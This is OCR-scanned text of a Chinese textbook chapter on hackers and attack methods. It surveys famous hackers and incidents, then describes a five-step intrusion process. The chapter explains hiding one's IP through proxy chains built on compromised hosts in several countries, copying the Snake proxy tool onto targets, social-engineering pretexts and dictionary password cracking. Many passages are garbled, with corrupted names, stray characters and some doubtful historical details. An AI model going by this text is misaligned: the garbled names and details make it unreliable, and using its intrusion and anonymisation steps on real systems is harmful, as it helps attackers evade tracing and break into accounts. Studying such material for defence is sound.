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上 ”头号 电脑 骇 客 ”。 这 位 著名 人 物 现 年 不 过 50 岁 , 但 其 传奇 的 黑客 经 历 足 以 令 全 世界 为 之 

2. Adrian Lamo 

区 德里 安 。 拉 莫 (Adrian Lamo) ,历史 上 五 大 最 著名 的 黑客 之 一 。Lamo 专门 找 大 的 组 
织 下 手 , 例 如 破解 进入 微软 和 (纽约 时 报 ) 的 网 络 。Lamo 喜欢 使 用 咖啡 店 `Kinko 店 或 者 图 
书馆 的 网 络 来 进行 他 的 黑客 行为 ,因此 得 了 一 个 这 号 : 不 回 家 的 黑客 。Lamo 经 常 发 现 安全 
漏洞 ,并 加 以 利用 。 通 常 他 会 告知 企业 相关 的 漏洞 。 

3. Jonathan James 


乔纳森 。 詹姆斯 (Jonathan James), 历 史上 五 大 最 著名 的 黑客 之 一 。16 岁 的 时 候 
James 就 已 经 恶名 远 播 ,因为 他 成 为 了 第 一 个 因为 黑客 行径 被 撒 入 狱 的 未 成 年 人 。 

4. Robert Tappan Morrisgeek 

罗伯特 ， 塔 潘 ， 葛 里 斯 吉 克 (Robert Tappan Morrisgeek) ,美国 历史 上 五 大 最 著名 的 
黑客 之 一 。Morris 的 父亲 是 前 美国 国家 安全 局 的 一 名 科学 家 ,叫做 Robert Morris。Robert 
是 Morris 蠕虫 病毒 的 创造 者 ,这 一 病毒 被 认为 是 首 个 通过 互联 网 传播 的 蠕虫 病毒 。 也 正 是 
如 此 ,他 成 为 了 首 个 以 1986 年 电脑 欺骗 和 滥用 法 案 被 起 诉 的 人 。 


6.1.6 主要 成 就 


(D) Richard Stallman: 传统 型 大 黑客 ,Stallman 在 1971 年 受聘 成 为 美国 麻 省 理工 学 院 
人 工 智能 实验 室 程序 员 。 

(2) Ken Thompson 和 Dennis Ritchie; 贝尔 实验 室 的 电脑 科学 操作 组 程序 员 。 两 人 在 
1969 年 发 明了 UNIX 操作 系统 。 

(3) John Draper LA PEE t K „Captain Crunch 闻名 ): 用 一 个 塑料 哨子 打 免 费 电 话 。 

(4) Mark Abene( 以 Phiber Optik 而 闻名 ): H T EELO /b 4p 262] "35 Fd VL AD HR 
话 系统 是 如 何 运 作 的 。 

(5) Robert Tappan Morrisgeek: 康 奈 尔 大 学 毕业 生 , 在 1988 年 散布 了 第 一 只 互联 网 


6.1.7 相关 事件 


1983 年 , 凯 文 。 米 特 尼 克 因 被 发 现 使 用 一 台大 学 里 的 电脑 擅自 进入 今日 互联 网 的 前 身 
ARPA 网 ,并 通过 该 网 进入 了 美国 五 角 大 楼 的 电脑 ,而 被 判 在 加 州 的 青年 管教 所 管教 了 6 
PHa 

1988 年 , 凯 文 。 米 特 尼 克 被 执法 当局 逮捕 ,原因 是 : DEC 指控 他 从 公司 网 络 上 盗 取 了 
价值 100 万 美元 的 软件 ,并 造成 了 400 万 美元 损失 。 

1993 年 ,自称 为 “骗局 大 师 ” 的 组 织 将 目标 锁定 美国 电话 系统 ,这 个 组 织 成 功 入侵 美 
国 国家 安全 局 和 美利坚 银行 ,他 们 建立 了 一 个 能 绕 过 长 途 电话 呼叫 系统 而 侵入 专线 的 
系统 。 

1995 年 ,来 自 俄罗斯 的 黑客 弗 拉 季 米 尔 。 列 宁 在 互联 网 上 上 演 了 精彩 的 偷 天 换 日 ,他 
是 历史 上 第 一 个 通过 入 侵 银 行 电脑 系统 来 获 利 的 黑客 。1995 年 ,他 侵入 美国 花旗 银行 并 次 


第 6 章 黑客 与 攻击 方法 103 


3E 1000 万 美元 ,他 于 1995 年 在 英国 被 国际 刑警 逮捕 ,之 后 ,他 把 账户 里 的 钱 转移 至 美国 、 芬 
兰 \ 荷 兰 、 德 国 、 爱 尔 兰 等 地 。 

1999 年 , 梅 利 莎 病 毒 (Melissa) 使 世界 上 300 多 家 公司 的 电脑 系统 崩溃 ,该 病毒 造成 的 
损失 接近 4 亿美 金 , 它 是 首 个 具有 全 球 破坏 力 的 病毒 ,该 病毒 的 编写 者 戴 维 ， 史密斯 在 编写 
此 病毒 的 时 候 年 仅 30 岁 。 戴 维 。 史 密斯 被 判处 5 年 徒刑 。 

2000 年 ,年 仅 15 岁 ,绰号 "黑手 党 男孩 ”的 黑客 在 2 月 6 日 到 2 月 14 日 情人 节 期 间 成 功 
侵入 包括 雅虎 .eBay 和 Amazon 在 内 的 大 型 网 站 服务 器 ,他 成 功 阻止 服务 器 向 用 户 提供 服 
务 , 于 同年 被 捕 。 

2007 年 ,俄罗斯 黑客 成 功 动 持 Windows Update 下 载 器 。 根 据 Symantec 研究 人 员 的 
消息 ,他 们 发 现 已 经 有 黑客 动 持 了 BITS, 可 以 自由 控制 用 户 下 载 更 新 的 内 容 , 而 BITS 是 完 
全 被 操作 系统 安全 机 制 信任 的 服务 , 连 防火 墙 都 没有 任何 警觉 。 这 意味 着 利用 BITS, 黑 客 
可 以 很 轻松 地 把 恶意 内 容 以 合法 的 手段 下 载 到 用 户 的 电脑 并 执行 。Symantec 的 研究 人 员 
同时 也 表示 ,他 们 发 现 的 黑客 正在 尝试 动 持 ,但 并 没有 将 恶意 代码 写 人 ,也 没有 准备 好 提供 
给 用 户 的 “ 货 ”, 但 提醒 用 户 要 提高 警觉 。 

2008 年 ,一 个 全 球 性 的 黑客 组 织 , 利 用 ATM 欺诈 程序 在 一 夜 之 间 从 世界 49 个 城市 的 
银行 中 盗 走 了 900 万 美元 。 黑 客 们 攻破 的 是 一 种 名 为 RBS WorldPay 的 银行 系统 ,用 各 种 
奇 技 淫 巧 取得 了 数据 库 内 的 银行 卡 信 息 , 并 在 11 月 8 日 午夜 ,利用 团伙 作案 从 世界 49 个 城 
市 总 计 超过 130 台 ATM 机 上 提取 了 900 万 美元 。 

2009 年 7 月 7 日 ,韩国 遭受 有 史 以 来 最 猛烈 的 一 次 攻击 。 韩 国 总 统 府 、 国 会 .国情 院 和 
国防 部 等 国家 机 关 , 以 及 金融 界 .媒体 和 防火 墙 企业 网 站 遭受 了 攻击 。7 月 9 日 韩国 国家 情 
报 院 和 国民 银行 网 站 无 法 被 访问 。 韩国 国会 .国防 部 、 外 交通 商 部 等 机 构 的 网 站 一 度 无 法 打 
开 。 这 是 韩国 遭遇 的 有 史 以 来 最 强 的 一 次 黑客 攻击 。 

2010 年 1 月 12 日 上 午 7 点 钟 开始 ,全 球 最 大 中 文 搜索 引擎 “百度 ” 遭 到 黑客 攻击 ,长 时 
间 无 法 正常 访问 。 主 要 表现 为 跳 转 到 一 雅虎 出 错 页面 .伊朗 网 军 图 片 ,出现 “天 外 符号 ?等 ， 
范围 涉及 四 川 .福建 .江苏 .吉林 浙江 ,北京 .广东 等 国内 绝 大 部 分 省 市 。 这 次 攻击 百度 的 黑 
客 疑 似 来 自 境外 ,利用 了 DNS 记录 算 改 的 方式 。 这 是 自 百 度 建立 以 来 ,所 章 遇 的 持续 时 间 
最 长 .影响 最 严重 的 黑客 攻击 ,网 民 访 问 百度 时 ,会 被 定向 到 一 个 位 于 荷兰 的 IP 地址 ,百度 
旗下 所 有 子 域名 均 无 法 正常 访问 。 

2013 年 3 月 11 日 ,国家 互联 网 应 急 中 心 (CNCERT/CC) 的 最 新 数据 显示 ,中 国 唱 受 境 
外 网 络 攻击 的 情况 日 趋 严重 。CNCERT 抽样 监测 发 现 ,2013 年 1 月 1 日 至 2 月 28 日 不 足 
60 天 的 时 间 里 ,境外 6747 台 木 马 或 僵尸 网 络 控制 服务 器 控制 了 中 国境 内 190 万 余 台 主机 ; 
其 中 位 于 美国 的 2194 台 控 制服 务 器 控制 了 中 国境 内 128.7 万 台 主 机 ,无 论 是 按照 控制 服务 
器 数量 还 是 按照 控制 中 国 主 机 数量 排名 ,美国 都 名 列 第 一 。 


6.2 黑客 攻击 五 部 曲 


黑客 攻击 和 网 络 安全 是 紧密 结合 在 一 起 的 ,研究 网 络 安全 不 研究 黑客 攻击 技术 简直 是 
纸上谈兵 ,研究 攻击 技术 不 研究 网 络 安全 就 是 闭门造车 。 
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某 种 意义 上 说 没有 攻击 就 没有 安全 ,系统 管理 员 可 以 利用 常见 的 攻击 手段 对 系统 进行 
检测 ,并 对 相关 的 漏洞 采取 措施 。 

网 络 攻击 有 善意 也 有 恶意 的 ,善意 的 攻击 可 以 帮助 系统 管理 员 检 查 系统 漏洞 ,恶意 的 攻 
击 可 以 包括 : 为 了 私人 恩怨 而 攻击 、 商 业 或 个 人 目的 获得 秘密 资料 、 民 族 仇恨 、 利 用 对 方 的 
系统 资源 满足 自己 的 需求 .寻求 刺激 、 给 别人 帮忙 以 及 一 些 无 目的 攻击 。 

一 次 成 功 的 攻击 ,都 可 以 归纳 成 基本 的 5 个 步骤 ,但 是 根据 实际 情况 可 以 随时 调整 , 归 
纳 起 来 就 是 “黑客 攻击 五 部 曲 ”: 

CD 隐藏 IP; 

(2) 踩点 扫描 ; 

(3) 获得 系统 或 管理 员 权 限 ; 

(4) 种 植 后 门 ; 

O) 在 网 络 中 隐身 。 


6.3 隐藏 IP 


6.3.1 隐藏 IP 的 方法 


隐藏 真实 IP 的 方法 有 以 下 三 种 。 

(1) 最 简单 的 方法 就 是 使 用 代理 服务 器 ,与 直接 连接 到 Internet 相 比 ,使 用 代理 服务 器 
能 保护 上 网 用 户 的 IP 地 址 ,从 而 保障 上 网 安全 。 代 理 服务 器 的 原理 是 在 客户 机 和 远程 服务 
器 之 间架 设 一 个 "中转 站 ”, 当 客户 机 向 远程 服务 器 提出 服务 要 求 后 ,代理 服务 器 首先 截取 用 
户 的 请 求 , 然 后 代理 服务 器 将 服务 请 求 转交 远程 服务 器 ,从 而 实现 客户 机 和 远程 服务 器 之 间 
的 联系 。 很 显然 ,使 用 代理 服务 器 后 远 端 服务 器 包括 其 他 用 户 只 能 探测 到 代理 服务 器 的 IP 
地 址 而 不 是 用 户 的 IP 地 址 ,这 就 实现 了 隐藏 用 户 IP 地 址 的 目的 ,保障 了 用 户 上 网 安全 。 而 
且 , 这 样 还 有 一 个 好 处 , 那 就 是 如 果 有 许多 用 户 共用 一 个 代理 服务 器 时 , 当 有 人 访问 过 某 一 
站 点 后 ,所 访问 的 内 容 便 会 保存 在 代理 服务 器 的 硬盘 上 ,如 果 再 有 人 访问 该 站 点 ,这 些 内 容 
便 会 直接 从 代理 服务 器 中 获取 ,而 不 必 再 次 连接 远 端 服务 器 ,因此 可 以 节约 带宽 ,提高 访问 
速度 。 

找到 免费 代理 服务 器 后 ,就 可 以 使 用 它 了 。 以 IE 浏览 器 为 例 ,运行 IE, 点 击 “ 工 具 ” 一 
"Internet 选项 ”, 在 弹出 的 “Internet 选项 ”对 话 框 中 选择 “连接 "标签 ,再 点 击 “ 局 域 网 设 
置 ?按钮 ,如 图 6-1 所 示 , 在 弹出 的 对 话 框 中 把 “为 LAN 使 用 代理 服务 器 "前面 的 框 勾 选 
上 ,然后 在 “地 址 ”和 “端口 " 栏 中 填 入 你 找到 的 代理 服务 器 IP 和 所 用 端口 即 可 ,如 图 6-2 
所 示 。 同 时 在 “高 级 "设置 中 你 还 可 以 对 不 同 的 服务 器 ,例如 HTTP, FTP 设 定 不 同 的 代 
理 服 务 器 地 址 和 端口 。 这 样 一 来 , 当 你 再 访问 那些 网 页 时 ,页 面 上 显示 的 就 不 再 是 你 的 
真实 下 了。 

(2) 隐藏 IP 的 另外 一 个 方法 是 利用 受 控 于 你 的 计算 机 上 的 木马 (也 就 是 利用 肉鸡 ) , 利 
用 这 台 计 算 机 进行 攻击 ,这样 即 使 被 发 现 了 ,也 是 “肉鸡 ”的 TP 地 址 。 

要 想 “ 隐 形 ” 还 必须 先 隐藏 计算 机 名 和 工作 组 。 因 为 网 上 有 许多 黑客 软件 可 以 查 出 你 的 
计算 机 名 和 工作 组 ,他 们 主要 是 通过 搜索 网 上 是 否 存 在 使 用 NetBIOS 协议 的 用 户 ,来 探测 
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Internet 选项 


zn 【安全 1 隐私 | 内 容 ES | 程序 1 高 级 


ES) 要 设置 一 个 Internet 连接 , 单 击 "设置 | SEO 


护 号 和 虚拟 专用 网 络 设置 


如 果 要 为 连接 配置 代理 服务 器 ERO ORT 


局 咸 同 (LAN) 设 置 


LAN 设置 不 应 用 到 拨号 连接 。 HFRS: RED) 
B5B RESA. 
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局 域 网 (LAN) 设 置 


自动 配置 

自动 肥 置 会 驯养 手动 设置 。 要 确保 使 用 手动 设置 ,请 禁用 自动 配置 。 
O 自动 检测 设置 D 

口 使 用 自动 配置 靶 本 C) 


代理 服务 器 
E Ar OEE EEATT ve E) 


HE SOW: 80 SiW 
加 紫 过 本 地 地 址 的 代理 服务 器 @) 


图 6-2 代理 服务 器 的 设置 步骤 2 


其 机 器 名 称 、IP 地 址 等 等 信息 ,并 借 此 来 攻击 。 

在 Internet 上 ,NetBIOS 开放 就 和 一 个 后 门 程序 差不多 。 因 为 在 安装 TCP/IP 协议 时 ， 
NetBIOS 也 被 Windows 作为 默认 设置 载 人 了 计算 机 ,而 计算 机 随即 也 具有 了 NetBIOS 本 
身 的 开放 性 。 换 句 话 讲 , 在 不 知 不 觉 间 ,计算 机 已 被 打开 了 一 个 危险 的 “后 门 ”。 这 个 后 门 可 
以 泄漏 你 的 信息 : 你 的 计算 机 名 和 工作 组 。 事实 上 ,有 许多 人 会 用 自己 的 真实 姓名 做 计算 
机 名 称 , 还 有 自己 的 单位 名 字 作 为 工作 组 ,这 样 很 容易 根据 某 个 人 的 固定 信息 找到 IP 地 址 。 
而 网 上 针对 IP 地 址 的 攻击 手段 和 工具 实在 是 太 多 了 ,这 是 很 危险 的 ,因此 ,如 果 是 一 个 单机 
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用 户 那么 完全 可 以 禁止 NetBIOS 服务 ,从 而 堵 上 这 个 危险 的 漏洞 ,对 于 Windows 2000 或 者 
Windows XP H P , 先 用 鼠标 右键 单 击 “ 网 上 邻居 ” ,选择 * 属 性”, 进 入 "网 络 和 拨号 连接 ”, 再 
用 鼠标 右键 单 击 “ 本 地 连接 ”, 选择“ 属性 ”, 进 入 “本 地 连接 属性 ”。 双 击 “Internet 协议 
(TCP/IP) "后 ,点 击 “ 高 级 ” ,选择 “ 选 项 ”条 中 的 “TCP/IP 筛选 ,在 “只 允许 ”中 填 人 除了 139 
之 外 要 用 到 的 端口 ,如 图 6-3 所 示 。 


TCP/Ip 筛选 7X 


DIBA TCE/IP Mt ANERE) QD 


Omt 回 全 部 允许 如 (0&8 
Ri OR itir g ORR U 
添加 节选 器 E373 
| dm 
| m | 
az | mh 


Æ 6-3 TCP/IP 筛选 


(3) 使 用 工具 软件 (IP 隐藏 工具 Hide IP Easy), Hide IP Easy 是 一 款 隐藏 真实 IP 的 实 
用 工具 ,可 以 帮助 你 轻松 隐藏 真实 卫 , 防 止 你 的 网 上 活动 被 监视 或 你 的 个 人 信息 被 黑客 窃 
取 , 采 用 的 是 高 度 匿 名 代理 , 它 通过 更 改 你 的 IP 地 址 ,使 服务 器 端 看 来 就 像 有 个 真正 的 客户 
浏览 器 在 访问 它 。 而 在 浏览 的 过 程 中 ,你 的 真实 IP 是 被 隐藏 起 来 的 ,服务 器 的 网 管 不 会 认 
为 你 使 用 了 代理 , 谁 也 不 知道 你 用 了 代理 。 但 是 需要 注意 的 是 ,Hide IP Easy 必须 与 IE, 
Firefox、Opera 等 浏览 器 配合 使 用 , 它 不 支持 Netscape 等 浏览 器 和 其 他 网 站 应 用 ,对 于 QQ 
等 通信 软件 则 无 法 进行 IP 代理 ,具体 使 用 请 参考 第 9 章 实验 十 三 。 

本 软件 仅 适用 IE 内 核 的 浏览 器 隐藏 TP 址 ,其 他 非 IE 内 核 浏览 器 无 效 , 即 只 有 使 用 TE 
内 核 浏览 器 才能 隐藏 你 的 真实 IP, 主 要 特点 : 匿名 网 络 冲 浪 和 保护 你 的 身份 。 


6.3.2 隐藏 IP 的 实例 


1. 网 络 代理 跳板 

当 从 本 地 入 侵 其 他 主机 的 时 候 , 自 己 的 IP 会 暴露 给 对 方 。 通 过 将 某 一 台 主 机 设置 为 代 
理 , 通 过 该 主机 再 入 侵 其 他 主机 ,就 会 留 下 代理 的 TP 地 址 ,这 样 就 可 以 有 效 地 保护 自己 的 安 
全 。 二 级 代理 的 基本 结构 如 图 6-4 所 示 。 


本 地 计算 机 代理 服务 器 1 代理 服务 器 2 被 入 侵 的 主机 
图 6-4 网 络 代理 跳板 结构 
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本 地 通过 两 级 代理 人 侵 某 一 台 主 机 ,这 样 在 被 人 侵 的 主机 上 ,就 不 会 留 下 的 自己 的 信 
委 。 可 以 选择 更 多 的 代理 级 别 , 但 是 考虑 到 网 络 带宽 的 问题 ,一 般 选 择 两 到 三 级 代理 比较 
适 


rp èr 


选择 代理 服务 器 的 原则 是 选择 不 同 地 区 的 主机 作为 代理 。 比 如 现在 要 入侵 北美 的 某 一 
台 主 机 ,选择 南非 的 某 一 台 主 机 作为 一 级 代理 服务 器 ,选择 北欧 的 某 一 台 计 算 机 作为 二 级 代 
理 , 再 选择 南美 的 一 台 主机 作为 三 级 代理 服务 器 ,这 样 就 很 安全 了 。 

可 以 选择 做 代理 的 主机 有 一 个 先决 条 件 , 就 是 必须 先 安装 相关 的 代理 软件 ,一般 都 是 将 
已 经 被 人 侵 的 主机 作为 代理 服务 器 。 

2. 网 络 代理 跳板 工具 的 使 用 

常用 的 网 络 代理 跳板 工具 很 多 ,这 里 介绍 一 种 比较 常用 而 且 功能 比较 强大 的 代理 工 
具 : Snake 代理 跳板 。Snake 的 代理 跳板 ,支持 TCP/UDP 代理 ,支持 多 个 (最 多 达到 255) 
跳板 。 

程序 文件 为 : SkSockServer. exe, 代 理 方式 为 Sock5 ,并 自动 打开 默认 端口 1813 监听 。 

使 用 Snake 代理 跳板 需要 首先 在 每 一 级 跳板 主机 上 安装 Snake 代理 服务 器 。 程 序 
文件 是 SkSockServer. exe, 将 该 文件 复制 到 目标 主机 上 。 具 体 使 用 请 参考 第 9 章 实验 
十 四 。 


6.4 踩点 (信息 收集 ) 扫 描 


信息 收集 是 指 通过 各 种 途径 ,各 种 方式 对 所 要 攻击 的 目标 进行 多 方面 的 了 解 , 获 取 所 需 
要 的 信息 。 信 息 收 集 是 信息 得 以 利用 的 第 一 步 , 也 是 关键 的 一 步 ,任何 可 得 到 的 蛛丝马迹 ， 
都 要 确保 信息 的 准确 ,信息 收集 工作 的 好 坏 ,直接 关系 到 入 侵 与 防御 的 成 功 与 否 , 收 集 的 主 
要 信息 包括 域名 LIP 地 址 ,操作 系统 、 主 机 类 型 .漏洞 情况 、 开 放 端 口 账户 密码 、 网 页 .邮箱 、 
公司 性 质 等 。 


6.4.1 信息 收集 的 原则 


为 了 保证 信息 收集 的 质量 ,应 坚持 以 下 原则 : 

(1) 准确 性 原则 : 该 原则 要 求 所 收集 到 的 信息 要 真实 、 可 靠 ,这 是 最 基本 的 要 求 。 

(2) 全 面 性 原则 : 该 原则 要 求 所 搜集 到 的 信息 要 广泛 ,全 面 完 整 。 

(3) 时 效 性 原则 : 信息 的 利用 价值 取决 于 该 信息 是 否 能 及 时 地 提供 , 即 它 的 时 效 性 。 
信息 只 有 及 时 、 迅 速 地 提供 给 它 的 使 用 者 才能 有 效 地 发 挥 作用 。 

信息 收集 手段 有 三 种 : 

CD 合法 途径 : 从 目标 机 构 的 网 站 获取 、 新 闻 报 道 、 出 版 物 . 新 闻 组 或 论坛 。 

D 社会 工程 学 手段 : 假冒 他 人 ,获取 第 三 方 的 信任 。 

(3) 搜索 引擎 : 搜索 引擎 是 自动 从 因特网 收集 信息 ,经 过 一 定 整 理 以 后 ,提供 给 用 户 进 
行 查询 的 系统 。 它 包括 信息 搜集 、 信 息 整理 和 用 户 查询 三 部 分 。 
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6.4.2 社会 工程 学 的 攻击 


社会 工程 学 是 使 用 计谋 和 假 情 报 去 获得 密码 和 其 他 敏感 信息 的 科学 ,研究 一 个 站 点 的 
策略 其 中 之 一 就 是 尽 可 能 多 地 了 解 这 个 组 织 的 个 体 ,因此 黑客 不 断 试图 寻找 更 加 精妙 的 方 
法 从 他 们 希望 渗透 的 组 织 那里 获得 信息 。 

举 个 例子 : 一 组 高 中 学 生 曾经 想 要 进入 一 个 当地 的 公司 的 计算 机 网 络 ,他 们 拟定 了 一 
个 表格 ,调查 看 上 去 显得 是 无 害 的 个 人 信息 ,例如 所 有 秘书 和 行政 人 员 以 及 他 们 的 配偶 、 防 
子 的 名 字 , 这 些 从 学 生 转 变 成 的 黑客 说 这 种 简单 的 调查 是 他 们 社会 研究 工作 的 一 部 分 。 利 
用 这 份 表格 这 些 学 生 能 够 快速 地 进入 系统 ,因为 网 络 上 的 大 多 数 人 是 使 用 宠物 和 他 们 配偶 
名 字 作为 密码 的 。 

目前 社会 工程 学 的 攻击 主要 包括 两 种 方式 : 打 电 话 请 求 密码 和 伪造 Email。 

(1) 打 电话 请 求 密码 : 打 电 话 询问 密码 也 经 常 奏 效 。 在 社会 工程 中 那些 黑客 冒充 失去 
密码 的 合法 雇员 ,经常 通 过 这 种 简单 的 方法 重新 获得 密码 。 

(2) 伪造 Email: 使 用 Telnet, 一 个 黑客 可 以 截取 任何 一 个 用 户 发 送 Email 的 全 部 信 
息 ,这 样 的 Email 消息 是 真 的 ,因为 它 发 自 于 一 个 合法 的 用 户 。 在 这 种 情形 下 这 些 信息 显得 
绝对 的 真实 ,黑客 可 以 伪造 这 些 信息 。 一 个 冒充 系统 管理 员 或 经 理 的 黑客 就 能 较为 轻松 地 
获得 大 量 的 信息 ,黑客 就 能 实施 他 们 的 恶意 阴谋 。 

具体 实施 的 方法 有 下 面 几 种 。 

1. 十 度 分 隔 法 

利用 电话 进行 欺诈 的 一 位 社会 工程 学 黑客 的 首要 任务 ,就 是 要 让 他 的 攻击 对 象 相信 ,他 
要 么 是 一 位 同事 ,要 么 是 一 位 可 信赖 的 专家 (比如 执法 人 员 或 者 审核 人 员 )。 但 如 果 他 的 目 
标 是 要 从 员工 X 处 获取 信息 的 话 ,那么 他 的 第 一 个 电话 或 者 第 一 封 邮件 并 不 会 直接 打 给 或 
发 给 X。 

2 学 会 说 行 话 

每 个 行业 都 有 自己 的 缩写 术语 。 而 社会 工程 学 黑客 就 会 研究 你 所 在 行业 的 术语 ,以 便 
能 够 在 与 你 接触 时 卖弄 这 些 术语 ,以 博得 好 感 。 这 其 实 就 是 一 种 环境 提示 ,假如 我 跟 你 讲 
话 , 用 你 熟悉 的 话语 来 讲 ,你 当然 就 会 信任 我 。 要 是 我 还 能 用 你 经 常 使 用 的 缩写 词汇 和 术语 
的 话 , 那 你 就 会 更 愿意 向 我 透露 信息 了 。 

3. 借用 目标 企业 的 “等 待 音乐 ” 

另外 一 种 成 功 的 技巧 是 记录 莫 家 公司 所 播放 的 “等 待 音乐 ”, 也 就 是 接 电话 的 人 尚未 接 
通 时 播放 的 等 待 乐曲 。 犯 罪 分 子 会 有 意 拨 通 电话 , 录 下 你 的 等 待 音乐 ,然后 加 以 利用 。 比 如 
当 他 打 给 某 个 目标 对 象 时 ,他 会 跟 你 谈 上 一 分 钟 然 后 说 : 抱 款 ,我 的 另 一 部 电话 响 了 ,请 别 
挂 断 , 这 时 ,受害 人 就 会 听 到 很 熟悉 的 公司 定制 的 等 待 音乐 ,此 人 肯定 就 在 本 公司 工作 ,这 是 
我 们 的 音乐 ,这 不 过 是 又 一 种 心理 暗示 而 已 。 

4. 电话 号 码 欺诈 

犯罪 分 子 常 常会 利用 电话 号 码 欺诈 术 , 也 就 是 在 目标 被 呼叫 者 的 来 电 显示 屏 上 显示 一 
个 和 主 叫 号 码 不 一 样 的 号 码 。 犯 罪 分子 可 能 是 从 某 个 公寓 给 你 打 的 电话 ,但 是 显示 在 你 的 
电话 上 的 来 电 号 码 却 可 能 会 让 你 觉得 好 像 是 来 自 同一 家 公司 的 号 码 , 于 是 ,你 就 有 可 能 轻 而 
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易 举 地 上 当 , 把 一 些 私人 信息 ,比如 口令 等 告诉 对 方 。 而 且 , 犯 罪 分 子 还 不 容易 被 发 现 ,因为 
如 果 你 回 挨 过 去 ,可 能 拨 的 是 企业 自己 的 一 个 号 码 。 

5. 利用 坏 消息 作案 

只 要 报纸 上 已 刊登 什么 坏 消息 ,犯罪 分 子 们 就 会 利用 其 来 发 送 社会 工程 学 式 的 垃圾 邮 
件 、 网 络 钓鱼 或 其 他 类 型 的 邮件 ,在 美国 的 经 济 危机 中 看 到 了 此 类 活动 的 增多 趋势 ,有 大 量 
的 网 络 钓鱼 攻击 是 和 银行 间 的 并 购 有 关 的 ,钓鱼 邮件 会 告诉 你 :“ 你 的 存款 银行 已 被 我 们 的 
银行 并 购 了 。 请 你 单 击 此 处 以 确保 能 够 在 该 银行 关 张 之 前 修改 你 的 信息 。 这 是 诱骗 你 泄露 
自己 的 信息 ,他 们 便 能 够 进入 你 的 账户 窃取 钱财 ,或 者 倒卖 储户 的 信息 。 

6. 滥用 网 民 对 社交 网 站 的 信任 

Facebook, MySpace 和 LinkedIn 都 是 非常 受 欢 迎 的 社交 网 站 。 很 多 人 对 这 些 网 站 十 分 
信任 。 已 经 有 越 来 越 多 的 社交 网 站 迷 们 收 到 了 自称 是 Facebook 网 站 的 假冒 邮件 ,结果 上 了 
当 。 用 户 们 会 收 到 一 封 邮件 称 : 本 站 正在 进行 维护 ,请 在 此 输入 信息 以 便 升级 之 用 。 只 要 
你 点 进去 ,就 会 被 链接 到 钓鱼 网 站 上 去 。 请 大 家 记 住 ,很 少 有 某 个 网 站 会 寄 发 要 求 输入 更 改 
口令 或 进行 账户 升级 的 邮件 。 

7. 输入 错误 捕获 法 

犯罪 分 子 还 常常 会 利用 人 们 在 输入 网 址 时 的 错误 来 作案 ,比如 当 你 输入 一 个 网 址 时 , 常 
常会 敲 错 一 两 个 字母 ,结果 转眼 间 你 就 会 被 链接 到 其 他 网 站 上 去 ,产生 了 意 想不到 的 结果 。 
坏 分 子 们 早 就 研究 透 了 各 种 常见 的 拼写 错误 ,而 他 们 的 网 站 地 址 就 常常 使 用 这 些 可 能 拼 错 
的 字母 来 做 域名 。 

8. 利用 FUD 操纵 股市 

一 些 产品 的 安全 漏洞 ,甚至 整个 企业 的 一 些 漏洞 都 会 被 利用 来 影响 股市 。 例 如 微软 产 
品 的 一 些 关键 性 漏洞 就 会 对 其 股价 产生 影响 ,每 一 次 有 重要 的 漏洞 信息 被 公布 ,微软 的 股价 
就 会 出 现 反复 的 波动 。 另 有 一 个 例子 表明 ,还 有 人 故意 传播 史 带 夫 。 乔 布 斯 的 死讯 ,结果 导 
致 苹果 的 股价 大 跌 。 这 是 一 个 利用 了 FUD( 和 恐慌 .不 确定 .怀疑 ), 从 而 对 股价 产生 作用 的 明 
显 事例 。 


6.5 扫描 策略 


踩点 的 目的 就 是 探 察 对 方 的 各 方面 情况 ,确定 攻击 的 时 机 。 摸 清 对 方 最 薄弱 的 环节 和 
守卫 最 松散 的 时 刻 ,为 下 一 步 的 入 侵 提供 良好 的 策略 。 
扫描 一 般 分 成 两 种 策略 : 一 种 是 主动 式 策略 , 另 一 种 是 被 动 式 策略 。 


6.5.1 被 动 式 策略 扫描 

被 动 式 策略 就 是 基于 主机 之 上 ,对 系统 中 不 合适 的 设置 .脆弱 的 口令 以 及 其 他 同安 全 规 
则 抵触 的 对 象 进行 检查 。 

被 动 式 扫描 不 会 对 系统 造成 破坏 ,而 主动 式 扫 描 对 系统 进行 模拟 攻击 ,可 能 会 对 系统 造 
成 破坏 。 
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被 动 式 扫描 的 工具 软件 有 GetNTUser、Superdic( 超 级 字典 文件 生成 器 )、Shed、 
PortScan 等 。 


1. GetNTUser 

其 主要 功能 包括 : 

。 扫描 出 NT 主机 上 存在 的 用 户 名 

* 自动 猜测 空 密码 和 与 用 户 名 相同 的 密码 

。 可 以 使 用 指定 密码 字典 猜测 密码 

。 可 以 使 用 指定 字符 来 穷 举 猜测 密码 

对 指定 的 IP 地 址 进行 扫描 ,首先 将 该 计算 机 添加 到 扫描 列表 中 ,选择 菜单 文件 File 下 
的 菜单 项 “添加 主机 ”, 输 入 要 扫描 目标 计算 机 的 IP 地 址 。 查 看 相应 的 结果 ,如 图 6-5 所 示 。 
利用 GetNTUser 可 以 对 计算 机 上 的 用 户 进行 密码 破解 。 首 先 设 置 密码 字典 ,设置 完 密码 
字典 以 后 ,将 会 用 密码 字典 里 的 每 一 个 密码 对 目标 用 户 进行 测试 ,如 果 用 户 的 密码 在 密码 字 
典 中 就 可 以 得 到 该 密码 ,具体 使 用 步骤 请 参考 第 9 章 实 验 十 五 。 


如 无 标题 - GetNTUser 


.-ini xi 
文件 日 视图 工具 (D 帮助 (H) 
ax go: aa? TT E | 
se ADE 二 ， 
E À RENN 
Name 


6-5 GetNTUser 界面 


2. Superdic( 超 级 字典 文件 生成 器 ) 

用 自己 定义 的 密码 字典 ,用 户 需 要 把 你 认为 可 能 是 的 密码 都 写 入 密码 字典 ,即使 这 样 也 
可 能 写 不 完全 ,所 以 我 们 可 以 使 用 超级 字典 文件 生成 器 生成 密码 ,Superdic 就 是 一 个 密码 生 
成 工具 ,如 图 6-6 所 示 , 在 破解 密码 用 来 穷尽 选择 的 字符 组 成 的 所 有 密码 ,如 图 6-7 所 示 。 
而 只 有 当 字 典 中 包含 潜在 账号 /密码 时 才 有 可 能 破解 成 功 , 具 体 使 用 步骤 请 参考 第 9 章 实验 
TAS 

3. Shed 共享 目录 扫描 

写 上 要 扫描 对 方 主机 的 地 址 段 ,得 到 对 方 计算 机 提供 了 哪些 目录 共享 。 通 常 有 用 的 共 
享有 两 种 ,一 种 就 是 我 们 常 说 的 共享 ,Windows 的 文件 打印 共享 ,双击 后 如 果 跳 出 对 话 框 叫 
你 输 密 码 , 不 知道 密码 就 进 不 去 ,但 很 多 时 候 都 能 直接 进去 。 另 一 种 共享 就 是 NT 的 默认 共 
